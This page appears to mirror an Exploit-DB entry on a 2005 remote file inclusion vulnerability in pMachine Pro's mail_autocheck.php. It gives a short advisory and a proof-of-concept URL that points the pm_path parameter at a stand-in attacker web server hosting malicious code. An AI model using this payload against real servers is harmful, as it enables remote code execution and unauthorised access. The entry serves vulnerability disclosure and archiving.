- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 25127
- Проверка EDB
-
- Пройдено
- Автор
- KC
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2005-0513
- Дата публикации
- 2005-02-19
Код:
source: https://www.securityfocus.com/bid/12597/info
PMachine Pro is reported prone to a remote file include vulnerability.
This issue affects the 'mail_autocheck.php' script.
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This will facilitate unauthorized access.
The latest version (2.4) of pMachine Pro is reported vulnerable. It is possible that other versions are affected as well.
http://www.example.com/pMachine/pm/add_ons/mail_this_entry/mail_autocheck.php?pm_path=http://attackers-webserver/malicious-code.php?- Источник
- www.exploit-db.com
